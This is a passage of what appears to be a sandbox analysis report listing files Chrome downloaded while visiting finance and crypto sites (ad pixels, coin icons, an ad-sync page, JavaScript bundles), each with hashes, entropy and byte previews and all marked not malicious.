                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.542568072448182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:poOG4Z2GisVEbC8P0jqarcGpOemu7JzVWO+SKW86UCXb:aOzYT8jDcuOru7SO+Sa/I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:25BCB059251CAA734D596E764838B1AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:66E6753403B44DD24721B823817E3029AE14A7C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1BD5B35DB23CFBEAEE8EC3AE974E46291F9BC6FF08CD717A5713E92C3B9AB02B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B6D0EFAF80771943BE04E0DF2293F51D8BD95C4FF8C076236B260CAF580A26F8E6948B9C45BECADB273CB28690BA92BC130330C2BD9EF7509A96446A33F87C8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....CIDATx^..1n.A..a......p.N..8...%G...$..\..#..B.............W.U.3..._..}.{.z....[..?.O>]..t..#.j..Z<....U...\..Ip.E.<..A....+>|-z...k.s..Y....n...o.o........?o....1.7.*.=....U..3.^E.*.F-..........?[...U.MZ.._........-[..k..-.3.....2.^.s..(3.^..gf..t.[T..e.k).-3.e:......z.y..{...bd...b^1.N../..}...F.t.Q.`...z.y.....d..=ZF..t..-..>-.<.|..v2#.d.'..:..vt.....s..b............;*.-.<...?}..}.:...].t.3.2|E......b>.b.._....R..`....1......=*.GU1.E. ...+...z.7.....b....._.}.5.z.....n...R.uu...}.NK1....}Q.<S.3.<S.#..eH.##.d.....`....b../`.Nf..1].........]....j)...\B........v........\SQ.#...K.a...W....N?.9.5.##.T...v".{.q.C.`...b.3.N.s..rd...b.2.^..(2...f...(.....v...n.s6qqf.....~..p..=.......5..U.z.......nV1.N..;..g.nZu....9&..k....Y..{v|.Z..{..Z...di..o...ZJ.qp.w.C.m........w.....}.............IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2790
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8767227836869775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qo7fR/FIbPYaCtgDY7aybeOur7PpRJl0+HsQK/FWPz09pqMSwk4Fv8d5tRjtXRHb:qZbYaHjvBLl0QI/FAK9SwL8L7Hb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2B4047EF139810F5403FE2987BD2DC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:529276C43A521743EB53DF1CFE8BC8FFFF220DFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:38C163ECBA73C000DF0ABFE2AD5C4F941164909F8078E8A304DBA4DB696BC709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D1E527D489BC5DB742681F87A0EFF100B8126BAEE0B9765E5BCCD9360A917ED4EE870ABD79E417693E36E600D4CBADC11E30CB73A630C3CE11A51BE4A2DC86C8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/2010.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq...........v..LW................?..$E........4.................;..!..0..4..+.......$G..1..............,..G..3...............f.....f.....t........Ae.Xx..(.?d.0W.........d..f..w..z..x..Gk.p..r......Tt.x.......d.....+....Gj...........<b."L.......Op....6[.......Kl.Tt.Vw.Yw..............V.s.....+....}......p..Wv....'Q....Ut.Rt.+T....y.....k.. H......Wx....&....8^.l...3....Fh.?e._}...Vv.Gk.....Yv.Z|.Ln.Dh.'R.'U.e..Hi.5\.My.Kk.m..Hk.....'.k..3X.1W.Gf....6[.{.....:.>\.+S.Ad..;.Yt..F.9^.On.z...5.:c.&L....z..Mm....k....Fk.z..1V.v..Bb.1Y.0T.Vw... I.3W.3W.....9....9`.@e.<^..R.^z....a.....y..Ip.}..m..c...3..1..-..4..A..4..8..(..D..&../..2..+.....5..0..@..I.!N.+V.#K..I..;.3\..J..)..D.+W.)R.$P..<.Ag.6`..F..>..2..=..0. N.?h.Hj..4..D.:c..7..;.vC......tRNS...........................+..........5'S4OO......"......\...a..`/.mH7~<...<>Q'B.......]>....(-78.kW.j+n.t...!...."..GS.0.i.b.J...^..p............
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=triplelift&uid=1998254139224437510781&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (444)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.298904939188764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:2ebxkC6DVU4dxhwVVIoO6DWV/MwxX5nI7MG0RoqoVl4hhOY92O8PXqtGTOoHoQL:2e2C6hHfhiVIoO2WV/MSX5nIMR2XbY9m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:68DC5CDE9A2F803576690875DB280C0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:781768CDFA00834C3D7236D9F0C56356B7CE81C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0D5009A3C448461AA61E9F533012AD626DB0DBF6F79E800434695FE6AA88E208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DD8FDE6001A244CFFEAC2B750A91DBA3F5D0768E6210EACD5BA3EAE13F343E43632340237EE31E102542D14EAF2BA6909B145E8A90194211AF7AAC530A18E1A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/pd?plm=6&ph=c2321ff9-d50d-4965-896f-6a7eb778bfb5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://p.rfihub.com/cm?pub=25&in=1"><img src="https://um.simpli.fi/ox_match"><img src="https://i.liadm.com/s/57424?bidder_id=206088&bidder_uuid=eb54da47-1de7-09c9-35d7-7ac4c5bfc5f7"><img src="https://aa.agkn.com/adscores/g.pixel?sid=9212314908&puid=f760e6bd-65f1-0829-1d13-0a48cfef963e"><img src="https://x.bidswitch.net/sync?ssp=openx"><img src="https://stags.bluekai.com/site/37274?limit=1&id=ccf65e65-1f4a-0e39-0da6-19e6d47964ab">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.965504626917684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:6sEiLQyPOQqzUd3SX7jSbBqt8qL3CWrmeuQwVx4lIHez:fEyP9qI1SX4n8La6wVilhz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:36C7A103DA669E7102DB2E95FA6E1AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2C7D65A7D8EDF0A7F34A61068C20EFAE77B6A4FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FF21CB418590A8EC25869FDCC3F3269793097D8D1AA8981B786791AB9A74A260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1425D51F45B5A0CD2782A9177A81D1A3266F16D452BE366FD8DD0ED15B6D2EC607438025F2F8F3783017037160F2BCE739AF5BBB7AE8AC76D8E5529E0296B4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/default/finance/favicon-192x192.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............R.l.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H................................................T.....pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^....@.IDATx..}...E.....od%+$.........o...QGgF.'..(*....t.u@..QT..E.M....HH..........{...A...}..:U}.....o.....d...X.\,S7UY._.C.UiU..51.1..4Fi....J...../.E[..<...kbN.5Y...8.CM..?..k..RS...k(J..S.$u+./..d9*.k....D.V..W.9.-Sy...8..Q...i...Y...U.S...9d.+..c|<.6.|-.RL.5nOq.;....SD...-.Z...0..vF&.gl..U.;....j....>w..E|.9T.8bM.G..(_j......xY...Wm\..UZ.x..&.\....q.M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3338
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.925806763050561
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:ceSTG3llo4Juco75PPPK9iiYzQHglCMhApOS:cJcJu7PPK9ivzQZR/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0D085DBBFB13EE615A4BB788243F87CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:19B10E56B69F1BB07507DCDC425052DC602E3608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:32E88B201B73007C95C4792414C44789793D0E309CFA7AB0DD522584C8471699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BACA07D3815A20A0988589A27BC761372C6E09B8C1794B9CB0FF80FC70853DA3C3CD468F5CAA1CECC2A16EDC8C2A8512E1D0F4CCE9DF09D9D81ABB1F9079F77B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/12409.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.Z.WTG...3g~.,I&.3.L\X....F...s.D.I...8*.4.fU. ..A.d......E...e.e.n.....Z%$......w..^......[o............{....52......>....&k..w..Z..6....o>...v.......xc6........5.....m...x.h...Q....pX#."..%.K.{..R...e.../j=.m=.2...1@X....chc.v1.o}G....>'......K89.|.IR0A.. ..c....P....A-./".+.".n_....M....+.........|.?.>....4l..ptCH..g.L...i../...x.c..[...f?....'...0...\-.a....p.........c..q.M..<..D.....i.FW...n.Dw....j....[...9..[.....02...&f..j..q5.N.A.r.7..a..0...F.ao.........E.D[d,.#.h...=.[tE.3r.l...j..lX.d...d..w........JT4,C....u.../.U.....^d2.".a.I.#.wcS.&.....x..?...j.t..?6}....(m....\........Qx.5r.E.](.....1r.n..|.AT[.2M.u.~u.P..l .3).....Ga.F..G.q..W8u.=..o....p.v.2.~......q.....>...Gp!*.W.2Q.m&...Ea\...x4...p.....[..H.......]U. .j+R..".H....Q.p(*..#....dDd.DL.NF.FVL6.lg.......pN.....P...{....;;.x'..5V......XD.QUVD...(......>.=;..;..{".{[..EH..Gjt.......k<..M_...[....x.N...Dl.........Dl.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):21130
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.976278766105335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:ePA9yrBru64fRlTsKx5wUIKX06AfiR2hdx0qzzFPMSWtX5NwSScwzC+48xSs:j9yFru64ploKjYKX0lfUWj0qzzFEppwB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A6AAE5E6CBD46080DE8EB9FE711E4AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A0A15F40C53B64732629A05E6938E0A51C4C4222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FD3FC5214145074ECB2466AD88C4E5BFAE89AFD43533139A7D3DBE4AA6C7CEAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5DF7C76545CF50FCF9ED86B19C71949A7B854DEF5073FE777539EFDBE63D9AB520FB99C55894E979A212B18C3361F18E53F14A953D2D522268887DCB259D15FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................d............................................R...........................!1."AQa..2q....#BR....$3b..%r.....4Tcs......&5CDSd.....................................:........................!...1..AQ"2a.3Bq...#$.4...%CR...............?..Q..........;....-.km11...m..U$xV...sm...ZdD.uM...<.Z...c6V.;...Z..I.R9d...........s..3'..;.k..J=.I ...x..I0..rCb..R..ci..W...j..--%irL.*2F.c\I3j.b...x.i...e.o..P..B...TlA...(....6.KaJ.'...KN\.s+.:9..v.qI.P.ur..%...fm... .Vi..K.VT..l.Ur.i4.F..0..I<.*.Ilf....8@[..t.:u..p.`.0.@.RFz..rQ...I...Q..o.'d..u.(.X.+...@....R.xu...<..,..vH.K.$...t.%Ar.....%....8...>......[..<#.6..<B..gT.#.P.7...y.YU.^...Qo. ..m..Y7&5.u.c. .....I...PN.{...;..}.6C...q....e.B..&[....@..-R.{.=..z....@o~.k..M......J%.>g....*.z.K.;...u..:.........qF....i..#..AO.5Fz.Vu.~.Q_}S?..v.~.-...'.5.Tf>.((.!Cj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2671
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.697670766435196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qDk1z4Gr0Oc3BTxrY0S9sfNq9IzcsGu+qd0USYw4E0VQd8Qs/7:qIKGIOUFrGesIiuXWUe4EmT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8E26118D7A63338CFEF1116720C92E0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8902985FAA4DB767EA26150E0058886B8874FB37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A0ED329B8CD852688196EA87F4496585AEB0047C57B1FADBFC87F7BB8B9CADA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5137311B25651141F093713BA390FBF9403398C35ED1F1178A95A99101DDBDCC4791B7CB60E7F39D7CB8216C9B5A65EA6AB02E61730D398C6BC805F8EFBBC49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq..#.1..8..1..S..J....................J.....O..0..+.....E..$..U..P.....'..<.....H.....J........B..D.....N...........?..C..S..V.....3..W..V..<..O...........L.....I..M.....R..F..B.....S..F..R..N..#.."..#..G..B.....$..A.....W..@..%.....0..V...........6..&........>..'..,..*..)..;..,..8.....=.....W..W..Z..W........A..N..H.....=.....&.....K.....I.....L.....M..0.."..*...........G..D.. ..@.....2..E..!..$..+..P..4..)..:..,..5..C..D..%..2..?..=..(..6..P..9..1..:.....0..R....e..R..*.. ..8..!.....-..^..o.....S.....;.....$.....S.....V..Y..!..g.....c..S..,..X..=..A..O..M..a.....T....[..J..&........T..j..I........,..C..v........D...........Q.....E..r..........9..0..Y..<.........7........".....C..2.....(..7..1.....V..|..C.....X...............X..Z.....z....W...\......tRNS......................e,....g..........+..............1.p.r..r1.p....||..|..|.C....bAA..bb...C.-.................................IDATX..w\.g.._
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13117)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.490749227583909
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:aTQjhffSyRv20R05HlYVtPJWUzrYwyLrbMI9FO9gkcFYAAp:aTQtSKvwHWTPJjzrRQ/MqFO9gkcFYAu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:125E5D20988757A660E00181048A0FC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:397BB96D6782E0794FD5756040CEF94E4305DCC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F378E5AFCE569D2300A90E46DB2F858A15A2B9E09B052203B678CBD445154886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D71D58C115D5A7EF0984C75EA6411E91015031EB65347C726D291AAE913B6450A8CAB020258818460FE2D1E949A1E63A3962F9CBB3B1A6090A63830FE5A8B18A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as x,e as V,b as Q,d as j,f as H,j as R,i as p,q as Z,k as g,l as ee,n as K,p as U,N as fe,V as ce,t as ye,h as Ie}from"./scheduler.Dr9AAxFe.js";import{S as Ae,i as Pe,t as d,g as D,a as b,e as E,c as I,b as C,m as M,d as S}from"./index.DCSmZEjO.js";import{N as Oe}from"./NavBar.DMjInWD3.js";import{D as Le}from"./DataTable.BD-itA9y.js";import{e as ze,h as Ve,g as je,t as G,q as ue}from"./commonUtil.CI22_Irn.js";import{M as B,a as $,g as He,b as Ue}from"./marketsUtil.ScItRG1n.js";import{f as Qe,l as Me}from"./logUtil.hOue7iAU.js";import{l as Re}from"./loadPredefinedListDetail.CYCLrdaP.js";import{l as We}from"./loadQuote.D9BAmXuK.js";import{l as qe}from"./loadTrendingTickers.BmFT6E7u.js";import{D as Be}from"./DataTablePagination.D9SvUQqJ.js";import{a as Ge}from"./headerUtil.D8XWvN0j.js";import{l as Ze}from"./loadQSPLeafNews.lDua51cx.js";import{n as Ke}from"./sectorUtil.CQpnlAmT.js";import{G as Se}from"./GradientScale.EwYudrQa.js";import{S as Ye,O as me}from"./Select.N-a6-Z3E.js";
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7769)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7770
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4331492673298385
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:KTMHB7+FbAiuespuhrnCrDrGPnY/5Gw2htEsjrYrR0v3z3v:KTMB6bAMsp+rnCrDc65Gw2h+sjrYrRkz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:283BE04D957F14C053AC30270B7E7BBF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8F92AF871BD2F09590E9376D9F2619E72198EFD1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:878B8FDFADDC699421DD7446205FB298B759AC531A37873FCEDF463DA6DBA2EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3182149EFB5DF8C997237472F9D9F1B6AA284142F6425EBF24F69EA102CE4EFB084EF2283073890364BFF66292F41102823739B7A85EFE4AB1E1C1ED868D5D6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as P,e as U,d as G,f as L,i as $,q as H,k as C,n as _,X as Q,P as Y,U as Z,b as ee,p as B,j as te,x as O,t as le,h as ne}from"./scheduler.Dr9AAxFe.js";import{S as z,i as q,t as y,a as S,c as A,b as N,m as T,d as R}from"./index.DCSmZEjO.js";import{ab as re,n as ae,a7 as ie,t as se}from"./commonUtil.CI22_Irn.js";import{u as oe,f as ce,s as ue}from"./StarRating.svelte_svelte_type_style_lang.CKEtkus0.js";import{S as J}from"./Sparkline.D1F12_MV.js";import{L as fe}from"./Link.Cll6KZpb.js";import{e as j}from"./each.BExQfwb4.js";import{I as K}from"./Icon.BSWt_jx8.js";import{a as me,S as ge}from"./star.BeZIjP36.js";var W=oe,X=ce,he=ue,_e=function(r,t){const{min:l,max:e,value:i,start:o=i,w:c=140,h:s=25,axisColor:n="#e0e4e9",labelTextColor:a="#5b636a",candleColor:u="#0f69ff",locale:V="en",fractionDigits:k=2,barHeight:d=2,font:w="10px Helvetica Neue, Helvetica, Arial, sans-serif"}=t;if(!W.isNumber(l)||!W.isNumber(e)||!W.isNumber(i))return;const p=1.2*W.extractFontSize(w),x=(s-p-d-2)/3,h=[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13117)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.490749227583909
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:aTQjhffSyRv20R05HlYVtPJWUzrYwyLrbMI9FO9gkcFYAAp:aTQtSKvwHWTPJjzrRQ/MqFO9gkcFYAu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:125E5D20988757A660E00181048A0FC4
